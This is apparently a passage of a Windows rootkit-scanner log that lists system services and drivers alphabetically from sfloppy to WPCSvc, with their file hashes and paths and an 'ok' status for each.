19:28:50.0702 0x0744  [ DB96666CC8312EBC45032F30B007A547, C3AE60FC65A36E96E0D2CC6E184481D70F91A19DC3E2E17E2873DD670A592DD7 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
19:28:50.0704 0x0744  sfloppy - ok
19:28:50.0727 0x0744  [ D1A079A0DE2EA524513B6930C24527A2, E2BC16DBCF38841EECD49C6FA1A9AC89C17F332F12606CA826F058E995E1B83D ] SharedAccess    C:\Windows\System32\ipnathlp.dll
19:28:50.0736 0x0744  SharedAccess - ok
19:28:50.0767 0x0744  [ 414DA952A35BF5D50192E28263B40577, 9C9BAFB9880DA6CC728506A142BE124E186219610DCC3460657A3CA93C865DF1 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
19:28:50.0777 0x0744  ShellHWDetection - ok
19:28:50.0784 0x0744  [ 2565CAC0DC9FE0371BDCE60832582B2E, 1A775214E86B83C2F1799F12D71077D81C89AD32734A248BA88787B7F104B79D ] sisagp          C:\Windows\system32\drivers\sisagp.sys
19:28:50.0787 0x0744  sisagp - ok
19:28:50.0821 0x0744  [ A9F0486851BECB6DDA1D89D381E71055, 7E909538AB758C18AC2CCBFFEE17BA36FA6ED2E674AA70924AA87AC61375FF35 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
19:28:50.0823 0x0744  SiSRaid2 - ok
19:28:50.0830 0x0744  [ 3727097B55738E2F554972C3BE5BC1AA, 75D52A596A298C33EC79A3B0B80F25492C08A182ABC679401502DA9597687566 ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
19:28:50.0832 0x0744  SiSRaid4 - ok
19:28:50.0846 0x0744  [ 3E21C083B8A01CB70BA1F09303010FCE, 803F8F91299C387110F34A49340E7136AAE91B418E2977A36285EA8F432FF197 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
19:28:50.0848 0x0744  Smb - ok
19:28:50.0869 0x0744  [ 6A984831644ECA1A33FFEAE4126F4F37, 753E23D2B33D47C52C05D892B052CFD96D93B97FB6E9FCB58EF1E4C4A125BF78 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
19:28:50.0874 0x0744  SNMPTRAP - ok
19:28:50.0879 0x0744  [ 95CF1AE7527FB70F7816563CBC09D942, CE8BACB91A5A86CBCE82619C6C1873B4D7593B00CED3B522E41B8F7F6258CC65 ] spldr           C:\Windows\system32\drivers\spldr.sys
19:28:50.0880 0x0744  spldr - ok
19:28:50.0906 0x0744  [ 866A43013535DC8587C258E43579C764, B2BE846B5167A2ECD1E30C69A81385FCC6EAE6033394D08458A5583D311C4D82 ] Spooler         C:\Windows\System32\spoolsv.exe
19:28:50.0916 0x0744  Spooler - ok
19:28:51.0045 0x0744  [ CF87A1DE791347E75B98885214CED2B8, 7AF4E03D751C951A4E5FBA28200DABFE6B3BF055490163EEEEA84EBA4D0F368A ] sppsvc          C:\Windows\system32\sppsvc.exe
19:28:51.0168 0x0744  sppsvc - ok
19:28:51.0187 0x0744  [ B0180B20B065D89232A78A40FE56EAA6, 4D045B23AD58A8822BE9F20119744A8D47455469D54494745CEB099951DA60FF ] sppuinotify     C:\Windows\system32\sppuinotify.dll
19:28:51.0192 0x0744  sppuinotify - ok
19:28:51.0216 0x0744  [ 112127C3B2E64D7680CC39CD0A39DD7E, ABE8B868CFE0EF4DAF886517047DBFD5A9C964983FAA499AC086CCD45BA46366 ] srv             C:\Windows\system32\DRIVERS\srv.sys
19:28:51.0224 0x0744  srv - ok
19:28:51.0238 0x0744  [ E5DD784A4EE5EBC72A86C677C988FCDB, 5D54C9AF291F8047DD66C31671F279A5D7EE8BCB5E55640F5F976E16211F59DD ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
19:28:51.0246 0x0744  srv2 - ok
19:28:51.0253 0x0744  [ CDBE627E16CC9E98F343D73F8E81D258, 25A68A6F943FCBA79A0D97ABC5B2EAEEB65C268F1CB2DD445ABF7E2758DF2802 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
19:28:51.0256 0x0744  srvnet - ok
19:28:51.0279 0x0744  [ D887C9FD02AC9FA880F6E5027A43E118, F38BAD90EC791368C37C21090302708D2DFB83ECE9096609AD9AA667B2E5592E ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
19:28:51.0286 0x0744  SSDPSRV - ok
19:28:51.0295 0x0744  [ D318F23BE45D5E3A107469EB64815B50, D74355E6FF215AA8CE53BC9DF16AF2740F2FC2FD754939478A3608BDA8C6DDA0 ] SstpSvc         C:\Windows\system32\sstpsvc.dll
19:28:51.0300 0x0744  SstpSvc - ok
19:28:51.0305 0x0744  [ DB32D325C192B801DF274BFD12A7E72B, F089DBA719E22BC269720A6B840B873A4AF5639745DB0C3DBC8BD2F2839A1ABA ] stexstor        C:\Windows\system32\drivers\stexstor.sys
19:28:51.0306 0x0744  stexstor - ok
19:28:51.0375 0x0744  [ E1FB3706030FB4578A0D72C2FC3689E4, A62EC9AA4514CAF2A10C0A3AEF7A36F593A7E7DA370A3F130C24E1B612E19427 ] StiSvc          C:\Windows\System32\wiaservc.dll
19:28:51.0392 0x0744  StiSvc - ok
19:28:51.0441 0x0744  [ 472AF0311073DCECEAA8FA18BA2BDF89, 089414057EB2047E42C96C1ACE79D509967461DC5A4D2836F63C04268637A3FC ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
19:28:51.0445 0x0744  storflt - ok
19:28:51.0480 0x0744  [ DCAFFD62259E0BDB433DD67B5BB37619, CBD12FF9BBF33D18B0F3D322B12EC62E7DF3BF45C6AD43D2E91FF4C4762E05D0 ] storvsc         C:\Windows\system32\drivers\storvsc.sys
19:28:51.0482 0x0744  storvsc - ok
19:28:51.0505 0x0744  [ E58C78A848ADD9610A4DB6D214AF5224, 1575A90EB22A4FB066459BDA00C6CAC10198C3C8C74493721EC6D34B51F50426 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
19:28:51.0506 0x0744  swenum - ok
19:28:51.0550 0x0744  [ A28BD92DF340E57B024BA433165D34D7, 889CC7FF143C3549982128473FF927CD80CF36485A347EF399C1271C8CE12CE4 ] swprv           C:\Windows\System32\swprv.dll
19:28:51.0565 0x0744  swprv - ok
19:28:51.0608 0x0744  [ F2AD8960812FD111E20E84659EF19D43, FAC91E940D3735738908447E58792C32E6F86427612114A624041B7213831105 ] Synth3dVsc      C:\Windows\system32\drivers\synth3dvsc.sys
19:28:51.0613 0x0744  Synth3dVsc - ok
19:28:51.0665 0x0744  [ 36650D618CA34C9D357DFD3D89B2C56F, 7C3774E53DCF32CB3A4B3504E32D2A651E18467FA0A6AC4C7993C696741B704B ] SysMain         C:\Windows\system32\sysmain.dll
19:28:51.0713 0x0744  SysMain - ok
19:28:51.0731 0x0744  [ 763FECDC3D30C815FE72DD57936C6CD1, 1A62C7E63E426D56894F4121C75D9C60FC9A14469ADBD0D6F0B94B8DE48CDA3E ] TabletInputService C:\Windows\System32\TabSvc.dll
19:28:51.0736 0x0744  TabletInputService - ok
19:28:51.0748 0x0744  [ 613BF4820361543956909043A265C6AC, FCFF02E466D2501630B452627FB218C01E5245A0921EE3D2117E7FD63AC7E98E ] TapiSrv         C:\Windows\System32\tapisrv.dll
19:28:51.0757 0x0744  TapiSrv - ok
19:28:51.0778 0x0744  [ B799D9FDB26111737F58288D8DC172D9, 409A60819A4305699E2E492A6190637FAAEBD19E745A5DB2A5D6977106C86591 ] TBS             C:\Windows\System32\tbssvc.dll
19:28:51.0782 0x0744  TBS - ok
19:28:51.0870 0x0744  [ 37E8FA3779668837CA9E2C36D2415949, FDDA99B7501CDBC3032AA12FD8E929F5E3B47DA112D0F8A05E2D833E5609EDEA ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
19:28:51.0918 0x0744  Tcpip - ok
19:28:51.0994 0x0744  [ 37E8FA3779668837CA9E2C36D2415949, FDDA99B7501CDBC3032AA12FD8E929F5E3B47DA112D0F8A05E2D833E5609EDEA ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
19:28:52.0018 0x0744  TCPIP6 - ok
19:28:52.0052 0x0744  [ CCA24162E055C3714CE5A88B100C64ED, 9B7712E793B9478BA7A1EF71EA9CC03CCB9C4004C54EAA911F158958519EDCD9 ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
19:28:52.0054 0x0744  tcpipreg - ok
19:28:52.0063 0x0744  [ 1CB91B2BD8F6DD367DFC2EF26FD751B2, 879E2827354BB21573AC6A7CCEB746D44214540687E6882FFCB4089546FBD954 ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
19:28:52.0065 0x0744  TDPIPE - ok
19:28:52.0070 0x0744  [ 2C10395BAA4847F83042813C515CC289, CBC058AE2EB6AA5905F9D2EF52573E1C06330462952E6D6E7083F8DB2C441E3E ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
19:28:52.0072 0x0744  TDTCP - ok
19:28:52.0078 0x0744  [ B459575348C20E8121D6039DA063C704, 1B4328A9EA39FF5A57F258E02254D04B73455F1DF7C997C13702A8B2F12D0347 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
19:28:52.0081 0x0744  tdx - ok
19:28:52.0087 0x0744  [ 04DBF4B01EA4BF25A9A3E84AFFAC9B20, 0D81B427720637882077C5024D738191F858FC734ED040697872D906351EF663 ] TermDD          C:\Windows\system32\DRIVERS\termdd.sys
19:28:52.0088 0x0744  TermDD - ok
19:28:52.0130 0x0744  [ 052306FD76793D5D5AB5D9891FD1ADBB, A590F01A42EC979664044B811E7C98F58D6A23AA025B5A1DD0E5F63BF70B2649 ] terminpt        C:\Windows\system32\drivers\terminpt.sys
19:28:52.0135 0x0744  terminpt - ok
19:28:52.0216 0x0744  [ 382C804C92811BE57829D8E550A900E2, 5F52C2E7902024CF1C9CC0069F411C3F19CCA3DB209F437FA0F3932D4898EB50 ] TermService     C:\Windows\System32\termsrv.dll
19:28:52.0235 0x0744  TermService - ok
19:28:52.0267 0x0744  [ 42FB6AFD6B79D9FE07381609172E7CA4, B57C85091209A2FAD19ED490B8FA7FC98F12911F9C9CACE9AF1E540780CE6700 ] Themes          C:\Windows\system32\themeservice.dll
19:28:52.0271 0x0744  Themes - ok
19:28:52.0288 0x0744  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] THREADORDER     C:\Windows\system32\mmcss.dll
19:28:52.0291 0x0744  THREADORDER - ok
19:28:52.0342 0x0744  [ 5AD05191DC8B444A7BA4D79B76C42A30, 6166E939A5A240388EBA5AF7FF335DC413F2BBCF74C2E1D310F4BE2A5454A610 ] TPM             C:\Windows\system32\drivers\tpm.sys
19:28:52.0346 0x0744  TPM - ok
19:28:52.0372 0x0744  [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A, 532A3A812578B2DFD83001DE66FC73689D79EC729409EB572E07E6D65B281712 ] TrkWks          C:\Windows\System32\trkwks.dll
19:28:52.0379 0x0744  TrkWks - ok
19:28:52.0399 0x0744  TrueSight - ok
19:28:52.0478 0x0744  [ 2C49B175AEE1D4364B91B531417FE583, 6C7995E18F84E465C376D1D5F153C15ACB66CDEA86EE5BF186677F572E7E129B ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
19:28:52.0491 0x0744  TrustedInstaller - ok
19:28:52.0523 0x0744  [ 254BB140EEE3C59D6114C1A86B636877, EE09D62E90407A40278F2136F640DAB16A4E2BF57D4FB6E05F92CA9CC9CF57C0 ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
19:28:52.0527 0x0744  tssecsrv - ok
19:28:52.0534 0x0744  [ FD1D6C73E6333BE727CBCC6054247654, 6F7B9AE1A5986204DB3348D13B303F30FC17624939DA74D6BD114FAEED0FB30E ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
19:28:52.0537 0x0744  TsUsbFlt - ok
19:28:52.0545 0x0744  [ 01246F0BAAD7B68EC0F472AA41E33282, 51F975AF029AD015576FFFA3E88F5DBB8B40C7CD30ECDEDE8AFABCB08C954199 ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
19:28:52.0547 0x0744  TsUsbGD - ok
19:28:52.0579 0x0744  [ 045ACB987C650D8186C6B4A692223860, C1CDDF7DABAE531C53290C7C70F35DD65751B399D269711865AD65F9E4E43B0B ] tsusbhub        C:\Windows\system32\drivers\tsusbhub.sys
19:28:52.0582 0x0744  tsusbhub - ok
19:28:52.0599 0x0744  [ B2FA25D9B17A68BB93D58B0556E8C90D, 0146931B733CAB1CD87F94C35F97E110D6ED6C55EAFF03345400A29AEDE99BDE ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
19:28:52.0602 0x0744  tunnel - ok
19:28:52.0616 0x0744  [ 750FBCB269F4D7DD2E420C56B795DB6D, E1A95C59148FE463539C34336FD0E74B31A33B8AB2B8E34AA10349C3347471D7 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
19:28:52.0618 0x0744  uagp35 - ok
19:28:52.0629 0x0744  [ EE43346C7E4B5E63E54F927BABBB32FF, BAD6FC3BEE45E644D5A6A0A31428F5B2AEC72A0AA0C74EF8177B1FE23EEF3AA9 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
19:28:52.0636 0x0744  udfs - ok
19:28:52.0671 0x0744  [ 8344FD4FCE927880AA1AA7681D4927E5, 1B54EFA60A221E2B9FFE59BB41C7E7D8B5AC6826F1C5577456D81371D464255A ] UI0Detect       C:\Windows\system32\UI0Detect.exe
19:28:52.0674 0x0744  UI0Detect - ok
19:28:52.0689 0x0744  [ 44E8048ACE47BEFBFDC2E9BE4CBC8880, 5D96D90FDF68AE470CC92CA9DF9DA2C05A53EF455A5A109DBBF7C96F3238257C ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
19:28:52.0692 0x0744  uliagpkx - ok
19:28:52.0704 0x0744  [ D295BED4B898F0FD999FCFA9B32B071B, D4130DB4AE76EE6DC0B8E7A4FEF5CB8B26EBD822C21021F6FA78FD29C1E211C2 ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
19:28:52.0706 0x0744  umbus - ok
19:28:52.0711 0x0744  [ 7550AD0C6998BA1CB4843E920EE0FEAC, 24C001E422C3B3B920CDCF6003A3179CE464DE4284775403DD5122EF9780460D ] UmPass          C:\Windows\system32\drivers\umpass.sys
19:28:52.0713 0x0744  UmPass - ok
19:28:52.0750 0x0744  [ 409994A8EACEEE4E328749C0353527A0, FFC57B647147DE2957A7DE4B330CC534DE7AC892A2FCE3BB164F7A516CAB1B56 ] UmRdpService    C:\Windows\System32\umrdp.dll
19:28:52.0757 0x0744  UmRdpService - ok
19:28:52.0780 0x0744  [ 833FBB672460EFCE8011D262175FAD33, C0C3067A305993CBF056C229771CB0593DD60C9C7AC5130FF1CA610BCA812AB5 ] upnphost        C:\Windows\System32\upnphost.dll
19:28:52.0790 0x0744  upnphost - ok
19:28:52.0797 0x0744  [ 7E72E7D7E0757D59481D530FD2B0BFAE, 288CAC9F4AC09DEB2B30C6E3A6ACF8D62A75576F62F0EC159D5E1B257419E9DC ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
19:28:52.0799 0x0744  usbccgp - ok
19:28:52.0805 0x0744  [ 04EC7CEC62EC3B6D9354EEE93327FC82, 6CB41D8644618A5F701F6CA91FB65BB94AA83EA48992133B5262DC539B334B2E ] usbcir          C:\Windows\system32\drivers\usbcir.sys
19:28:52.0808 0x0744  usbcir - ok
19:28:52.0814 0x0744  [ CFBCE999C057D78979A181C9C60F208E, D60698EAA8A085214D5945818B0863976CF116EBE523046C344AF4E9392FDF80 ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
19:28:52.0816 0x0744  usbehci - ok
19:28:52.0904 0x0744  [ 9D22AAD9AC6A07C691A1113E5F860868, AC34D36DBB5649650FCD873A792CA1387AE841D4C46781C63C0D29834F9B58E9 ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
19:28:52.0921 0x0744  usbhub - ok
19:28:52.0934 0x0744  [ A6FB7957EA7AFB1165991E54CE934B74, 1CE83D9E3276AE380F720C7700A17D58A37A2A77FD72DA69EE0C756B88DB3689 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
19:28:52.0938 0x0744  usbohci - ok
19:28:52.0951 0x0744  [ 797D862FE0875E75C7CC4C1AD7B30252, 1BBE745E4C85F8911076F6032ACD7A35FAC048D3CB1500C64E08D8B2C70A1069 ] usbprint        C:\Windows\system32\drivers\usbprint.sys
19:28:52.0954 0x0744  usbprint - ok
19:28:52.0965 0x0744  [ BF63EBFC6979FEFB2BC03DF7989A0C1A, AFEF764A3E5D52CDBB5074F0E87F2B5EBCDF8D9B6E8F88EE235602B80145BE31 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
19:28:52.0968 0x0744  USBSTOR - ok
19:28:52.0973 0x0744  [ 78780C3EBCE17405B1CCD07A3A8A7D72, FBFF3111E22EE0B4BCAFA81F89AAE985135BFF48EEFD130C09B49CCF8A9946B9 ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
19:28:52.0975 0x0744  usbuhci - ok
19:28:53.0015 0x0744  [ 45F4E7BF43DB40A6C6B4D92C76CBC3F2, F9B72DE82078FDB5551D48988190F46EECA9B99655C591B7865FEA1AFB31F637 ] usbvideo        C:\Windows\system32\Drivers\usbvideo.sys
19:28:53.0020 0x0744  usbvideo - ok
19:28:53.0046 0x0744  [ 081E6E1C91AEC36758902A9F727CD23C, 9FDAA17A3B99067E035E5D76305427F15FFDBC5D304B2BB78AFC6463EDDE1A75 ] UxSms           C:\Windows\System32\uxsms.dll
19:28:53.0051 0x0744  UxSms - ok
19:28:53.0063 0x0744  [ F42309C4191C506B71DB5D1126D26318, 29B0A8889857CEBFA6CBD795D5EECDDFFA04E794BD3C73FC488725B2A160F326 ] VaultSvc        C:\Windows\system32\lsass.exe
19:28:53.0065 0x0744  VaultSvc - ok
19:28:53.0081 0x0744  [ A059C4C3EDB09E07D21A8E5C0AABD3CB, BDD3729B49DF2E2FC72FFEF9D10235B481A671DE5A721B6B9A80873B7A343F07 ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
19:28:53.0083 0x0744  vdrvroot - ok
19:28:53.0104 0x0744  [ C3CD30495687C2A2F66A65CA6FD89BE9, 582E4706C1D6A151020D14B26C7BF166F4E42BDD6E410F30EC452469270C5E9B ] vds             C:\Windows\System32\vds.exe
19:28:53.0118 0x0744  vds - ok
19:28:53.0124 0x0744  [ 17C408214EA61696CEC9C66E388B14F3, 829C0416672E2B2DFABCFE641E7F281F41E8DBB3C0EF11C7784CB9BB94F87E97 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
19:28:53.0126 0x0744  vga - ok
19:28:53.0131 0x0744  [ 8E38096AD5C8570A6F1570A61E251561, 4DBA3C1397A2203548F45F006E66D99F837903F601ABBCE2304754F783CA8A39 ] VgaSave         C:\Windows\System32\drivers\vga.sys
19:28:53.0134 0x0744  VgaSave - ok
19:28:53.0138 0x0744  VGPU - ok
19:28:53.0172 0x0744  [ 5461686CCA2FDA57B024547733AB42E3, 2721D0659AA890172FCAD4EC4D926B58ACD0EE4887DA51545DC7237420D5BF84 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
19:28:53.0178 0x0744  vhdmp - ok
19:28:53.0199 0x0744  [ C829317A37B4BEA8F39735D4B076E923, 55D1796AE750071E1E05BD7702B6C355CCFFE27B4C00E93E7044C3184732B497 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
19:28:53.0202 0x0744  viaagp - ok
19:28:53.0208 0x0744  [ E02F079A6AA107F06B16549C6E5C7B74, B530DCE3EE4F285B3D5F69F7148D17E016D54F04E6F93706B829A34567748788 ] ViaC7           C:\Windows\system32\drivers\viac7.sys
19:28:53.0210 0x0744  ViaC7 - ok
19:28:53.0215 0x0744  [ E43574F6A56A0EE11809B48C09E4FD3C, 3687BF638E21C00E62ABFED70D728B91ADA08F7164CA898E654F31DA196589E9 ] viaide          C:\Windows\system32\drivers\viaide.sys
19:28:53.0217 0x0744  viaide - ok
19:28:53.0249 0x0744  [ C2F2911156FDC7817C52829C86DA494E, FE499F189B5016FCE0018AA3DE3970B72275B7B15F3D4D608117F6DDEC6B90DC ] vmbus           C:\Windows\system32\drivers\vmbus.sys
19:28:53.0255 0x0744  vmbus - ok
19:28:53.0260 0x0744  [ D4D77455211E204F370D08F4963063CE, 2018B2A84C73E0834200A594C02A9D28C74906F126DAD3CCDDFC9CD9A61669E2 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
19:28:53.0263 0x0744  VMBusHID - ok
19:28:53.0268 0x0744  [ 4C63E00F2F4B5F86AB48A58CD990F212, 9796BD4B9CFEEEAF57C5E332A732EFC2770B21F9B35301A5D202F5FC52C1E035 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
19:28:53.0270 0x0744  volmgr - ok
19:28:53.0283 0x0744  [ B5BB72067DDDDBBFB04B2F89FF8C3C87, 65B9AD55F43940A5FDD88B6EC5034A7E375DF8E6F5F1AE6519A4BD6B7E992EBC ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
19:28:53.0290 0x0744  volmgrx - ok
19:28:53.0318 0x0744  [ F497F67932C6FA693D7DE2780631CFE7, DAE544ED99D2CF570DA31343BD87D2F856D0D13529656D38E1BF854C77F017F6 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
19:28:53.0324 0x0744  volsnap - ok
19:28:53.0334 0x0744  [ 9DFA0CC2F8855A04816729651175B631, 37FD9E43A2A3F125E94A315FB4CD8A1B5499A5FD74806EB2D1E5DA88C070D3A3 ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
19:28:53.0339 0x0744  vsmraid - ok
19:28:53.0422 0x0744  [ 209A3B1901B83AEB8527ED211CCE9E4C, 1A431F6409F8E0531F600F8F988ECECECB902DA26BBAAF1DE74A5CAC29A7CB44 ] VSS             C:\Windows\system32\vssvc.exe
19:28:53.0450 0x0744  VSS - ok
19:28:53.0457 0x0744  [ 90567B1E658001E79D7C8BBD3DDE5AA6, EFC23BEEA7F54A2DC56CB523DAD1AF0358D904C5278BF08873910E2DB3F13557 ] vwifibus        C:\Windows\System32\drivers\vwifibus.sys
19:28:53.0458 0x0744  vwifibus - ok
19:28:53.0472 0x0744  [ 55187FD710E27D5095D10A472C8BAF1C, AE298E2D3BA366BCBDC092C717214C181E8843FA564A6DFB07FC3238A5A68DC3 ] W32Time         C:\Windows\system32\w32time.dll
19:28:53.0483 0x0744  W32Time - ok
19:28:53.0491 0x0744  [ DE3721E89C653AA281428C8A69745D90, 501C78056ED4295625D8A5412025FD2F0CA24077044D3A5800BA79DF3D946516 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
19:28:53.0494 0x0744  WacomPen - ok
19:28:53.0551 0x0744  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
19:28:53.0557 0x0744  WANARP - ok
19:28:53.0597 0x0744  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
19:28:53.0600 0x0744  Wanarpv6 - ok
19:28:53.0660 0x0744  [ 691E3285E53DCA558E1A84667F13E15A, 12EDB66EF8FC100402BEA221F354D3BD5542F6DDF715B6E7D873D6BAE7E3D329 ] wbengine        C:\Windows\system32\wbengine.exe
19:28:53.0706 0x0744  wbengine - ok
19:28:53.0719 0x0744  [ 9614B5D29DC76AC3C29F6D2D3AA70E67, A2FFB92F0030B4CD771E862DA575ECCF2F3A5B4B85858C1241A0C59262C0EC88 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
19:28:53.0725 0x0744  WbioSrvc - ok
19:28:53.0738 0x0744  [ 34EEE0DFAADB4F691D6D5308A51315DC, A040A03E25A0C78B9E26F86C2DF95BCAF8E7EC90183CEB295615D3265350EBEE ] wcncsvc         C:\Windows\System32\wcncsvc.dll
19:28:53.0748 0x0744  wcncsvc - ok
19:28:53.0759 0x0744  [ 5D930B6357A6D2AF4D7653BDABBF352F, 677FF2ED14EE0B0CAA710DA81556CC16D5971DAB10E7C7432D167A87CA6F0EAA ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
19:28:53.0764 0x0744  WcsPlugInService - ok
19:28:53.0779 0x0744  [ 1112A9BADACB47B7C0BB0392E3158DFF, 1AE2AFA125973571F91E6945FE8A735F63D76EBB250A0075D98C580167FD9ED4 ] Wd              C:\Windows\system32\drivers\wd.sys
19:28:53.0780 0x0744  Wd - ok
19:28:53.0797 0x0744  [ 9950E3D0F08141C7E89E64456AE7DC73, DE4B96812B305A63F5874BBF2DC40354FB45B3D96C1D33436E677099760BA448 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
19:28:53.0808 0x0744  Wdf01000 - ok
19:28:53.0827 0x0744  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiServiceHost  C:\Windows\system32\wdi.dll
19:28:53.0833 0x0744  WdiServiceHost - ok
19:28:53.0839 0x0744  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiSystemHost   C:\Windows\system32\wdi.dll
19:28:53.0844 0x0744  WdiSystemHost - ok
19:28:53.0886 0x0744  [ A9D880F97530D5B8FEE278923349929D, 6A293E2DB9B7C434EA8B4CD4861E11905D46BD60E014AE27B74DC8C4B2DDF834 ] WebClient       C:\Windows\System32\webclnt.dll
19:28:53.0894 0x0744  WebClient - ok
19:28:53.0915 0x0744  [ 760F0AFE937A77CFF27153206534F275, A53940BA28854486FF18F16B98A3314B36322B0B6EFB54D08B921315BEB0ADD5 ] Wecsvc          C:\Windows\system32\wecsvc.dll
19:28:53.0922 0x0744  Wecsvc - ok
19:28:53.0933 0x0744  [ AC804569BB2364FB6017370258A4091B, 1856F354146A5946F3E7D0DD09726FC8A3502B0F0776FEADDF10669C81CC28E2 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
19:28:53.0939 0x0744  wercplsupport - ok
19:28:53.0972 0x0744  [ 08E420D873E4FD85241EE2421B02C4A4, E1E9436EB096FF7DE9A76DA6217035257EF9FC7565DDB9016DCA3859E7F1EF0F ] WerSvc          C:\Windows\System32\WerSvc.dll
19:28:53.0978 0x0744  WerSvc - ok
19:28:54.0001 0x0744  [ 8B9A943F3B53861F2BFAF6C186168F79, 88E2F79F32AFBA17CB8377A508B83A1EC2315E9F3A365F591C87FE4525AA6713 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
19:28:54.0003 0x0744  WfpLwf - ok
19:28:54.0009 0x0744  [ 5CF95B35E59E2A38023836FFF31BE64C, CEA21302B3E855EE592810D4E0DE10E47A47A393064C435463CD54598735CD8D ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
19:28:54.0011 0x0744  WIMMount - ok
19:28:54.0016 0x0744  WinHttpAutoProxySvc - ok
19:28:54.0154 0x0744  [ F62E510B6AD4C21EB9FE8668ED251826, FA3E5CAC3E67E49377320CFBE4646585E6B62168292768FEA81E4623F9166890 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
19:28:54.0169 0x0744  Winmgmt - ok
19:28:54.0268 0x0744  [ 1B91CD34EA3A90AB6A4EF0550174F4CC, 5B6618615EBFBA594C945AD35F5C68DA8C6053892B6D12D626BB6120910D80DC ] WinRM           C:\Windows\system32\WsmSvc.dll
19:28:54.0315 0x0744  WinRM - ok
19:28:54.0397 0x0744  [ A67E5F9A400F3BD1BE3D80613B45F708, E170A8BD31A779403DC9C43ED6483DA8E186512D3EE700B87F6BA292E284E367 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
19:28:54.0402 0x0744  WinUsb - ok
19:28:54.0473 0x0744  [ 16935C98FF639D185086A3529B1F2067, E9C6B73A572A04FCE9B1B0E6815F941B10332D9A6D55B92927C2B1275F119091 ] Wlansvc         C:\Windows\System32\wlansvc.dll
19:28:54.0502 0x0744  Wlansvc - ok
19:28:54.0523 0x0744  [ 0217679B8FCA58714C3BF2726D2CA84E, 4494984B922DCF24D37BCD0E6831CEBD07D1CA49235D04E821D17ED3DF84ED2A ] WmiAcpi         C:\Windows\system32\DRIVERS\wmiacpi.sys
19:28:54.0524 0x0744  WmiAcpi - ok
19:28:54.0566 0x0744  [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
19:28:54.0571 0x0744  wmiApSrv - ok
19:28:54.0665 0x0744  [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
19:28:54.0705 0x0744  WMPNetworkSvc - ok
19:28:54.0745 0x0744  [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
19:28:54.0749 0x0744  WPCSvc - ok
